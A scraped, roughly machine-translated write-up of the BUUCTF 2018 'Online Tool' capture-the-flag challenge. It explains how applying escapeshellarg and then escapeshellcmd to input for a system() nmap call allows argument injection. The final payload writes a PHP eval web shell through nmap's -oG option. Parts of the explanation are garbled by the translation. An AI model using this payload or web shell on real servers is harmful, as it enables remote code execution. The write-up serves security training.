[Original title reproduction + audit] [BUUCTF 2018] WEB Online Tool (escapeshellarg and escapeshellcmd result of improper use rce)

Others 2020-03-13 10:13:13 views: null

 Brief introduction

 Reproduce the original question: https://github.com/glzjin/buuctf_2018_online_tool (environment php5.6.40)

 Examine knowledge:escapeshellarg and the escapeshellcmdresult of improper use rce

 Online Platform: https://buuoj.cn (Beijing Union University public platform CTF) can be used within the interior of Yulin College Principal Association CTF training platform to find this title

 process

Simple audit

Dog dish open the page to see the source code to see two functions do not know wp see it. . .

 1 <?php
 2 
 3 print_r($_SERVER['HTTP_X_FORWARDED_FOR']);
 4 if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
 5     $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
 6     print("1");
 7 }
 8 
 9 if(!isset($_GET['host'])) {
10     highlight_file(__FILE__);
11 } else {
12     $host = $_GET['host'];
13     $host = escapeshellarg($host);
14     $host = escapeshellcmd($host);
15     $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
16     echo 'you are in sandbox '.$sandbox;
17     @mkdir($sandbox);
18     chdir($sandbox);
19     echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
20 }

 

First learn to understand the function of two strangers

escapeshellcmd

escapeshellcmd -  shell metacharacters escaped

escapeshellcmd () on a string of characters likely to deceive shell command to execute arbitrary commands escaped. This function guarantees that the user input data being sent to the  exec ()  or  system ()  function, or  performing operator  escape before.

Backslash (\) will be inserted before the following characters:  & #; `| * ~ <> ^ () [] {} $ \?\ X0A  and  \ xFF'  And  '  only escape when the mismatch children. On Windows platforms, as well as all these characters  %  and  !  Characters are replaced by spaces.

<?php 
var_dump(escapeshellcmd("xiaohua da wang"));
echo "<br>";
var_dump(escapeshellcmd("xiaohua 'da' wang"));
echo "<br>";
var_dump(escapeshellcmd("xiaohua '''da' 'wang"));
echo "<br>";

Result: only escaped single quotes in each occurrence 

escapeshellarg

escapeshellarg -  string transcode parameters can be used in shell command in

escapeshellarg () will increase in a single quote and string can cite any single quotes or transcoding already present, so that to ensure that the string passed to the shell directly to a function, and also to ensure safety. For some parameters entered by the user should use this function. shell functions comprising Exec ()System ()  execution operator  .

<?php 
var_dump(escapeshellarg("xiaohua da wang"));
echo '<br>';
var_dump(escapeshellarg("xiaohua 'da' wang"));
echo '<br>';
var_dump(escapeshellarg("xiaohua '''da' wang"));
echo '<br>';

Results: As long as it appears to be escaped single quotes

所以说escapeshellcmdAnd the difference is that escapeshellarg, the former only have a single drop of single quotes to escape, while the latter will be all single quotes to escape, the former will escape some special characters such as:

& # ; ` | * ? ~ < > ^ ( ) [ ] { } $ 
<?php 
var_dump(escapeshellcmd("& # ; ` | * ? ~ < > ^ ( ) [ ] { } $"));
echo "<br>";

 

Reference to learn: https: //paper.seebug.org/164/

Parameters are passed: 172.17.0.2 ' -v = -da. 1
After processed into a escapeshellarg '172.17.0.2' \ '' = -v -da. 1 ' , i.e., the first single quote escaping, and then left and right portions of the single quotation marks enclosed connected so as to function.
After escapeshellcmd treatment becomes ' 172.17.0.2 '\\' ' -v -da = 1 \', because escapeshellcmd to \ and, finally, the unpaired children's quotes were escaped: http: //php.net /manual/zh/function.escapeshellcmd.php
The last command executed is curl '172.17.0.2' \\ '' = -v -da. 1 \ ", because the intermediate is interpreted as \\ \ rather escape character behind 'is not escaped, and again later 'children become a blank mating connector. It can be reduced to curl 172.17.0.2 \ -v -da = 1 ' , ie 172.17.0.2 \ initiation request, POST data to a = 1'.

nmap parameters: https: //blog.csdn.net/qq_26090065/article/details/80285088

There is a parameter -oG can achieve the command and writes the results to a file in the nmap command

The final payload

This is our command input controllable! Then written to a file

?host=' <?php @eval($_POST["xiaohua"]);?> -oG xiaohua.php '

 

Displays the generated folder name we put together the next visit

http://6b6aa4fa-cc55-4b5d-8dd9-9ba66a236355.node3.buuoj.cn/4d484018dc3b664c4cc70a3ef2b8e7a3/xiaohua.php

 

Reference Learning: Online Tool (BUUCTF 2018)

    PHP escapeshellarg()+escapeshellcmd() 之殇

Guess you like

Origin www.cnblogs.com/xhds/p/12484510.html
Recommended
NetBSD bans submission of code generated by AI
Ranking
Talk dubbo of LRUCache
Chapter 1 Learning Summary
Introduction to Virtualization
pytorch 调用lstm
Six modules
[8086] The natural number of 1 to 36 into a 6x6 two-dimensional array of line-sequentially, and then print out the lower left half of the triangular array
mybatis mapper mapping file $ # {} {} understanding and
C language input and output buffer
c language floating-point input and output
andorid P version compatible, refer to Huawei
Daily
More
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)

Code World

© 2018 codetd.com